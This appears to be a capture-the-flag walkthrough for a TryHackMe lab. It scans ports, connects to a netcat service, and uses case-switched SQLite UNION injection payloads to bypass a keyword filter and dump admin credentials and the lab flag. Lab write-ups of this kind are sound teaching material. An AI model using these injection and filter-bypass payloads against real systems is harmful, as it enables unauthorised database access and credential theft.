Skip to main content

Light

Reconnaissance

We start by setting an environment variable for the target IP to simplify command execution:

export TARGET_IP=10.10.13.202

Full Port Scan with Nmap

sudo nmap -p- -Pn --min-rate 5000 $TARGET_IP

Results:

Not shown: 65441 closed tcp ports (reset), 92 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste

We identified two open ports: 22 (SSH) and 1337 (unknown service).

Initial Access via Netcat

After detecting an open service on port 1337, we interact with it using Netcat:

nc $TARGET_IP 1337

Upon connecting, the service prompts for a username. A provided username (smokey) returns a password:

Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

This suggests possible SQL Injection vulnerabilities if authentication logic is flawed.

SQL Injection Exploitation

Since the system returns data upon entering a username, we attempt SQL Injection to extract information.

Enumerating Tables

' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master WhErE type='table' AnD 'a'='a

Explanation:

  • sqlite_master → Stores database metadata.
  • type='table' → Filters only table names.
  • GROUP_CONCAT(name) → Merges all table names into a single string.
  • Case-switching bypass: Some SQL commands are blocked, but changing case circumvents restrictions.

Discovered Tables:

usertable, admintable

Extracting Column Names from admintable

' uNiOn SeLeCt GrOuP_CoNcAt(name) From pragma_table_info('admintable') WhErE 'a'='a

Explanation:

  • pragma_table_info('admintable') → Retrieves column names from admintable.
  • GROUP_CONCAT(name) → Concatenates all column names.

Columns Found:

id, username, password

Extracting Data from admintable

' uNiOn SeLeCt GrOuP_CoNcAt(id || ':'  || username ||  ':' ||  password) From admintable WhErE 'a'='a

Extracted Credentials:

1:TryHackMeAdmin:mamZtAuMlrsEy5bp6q17
2:flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}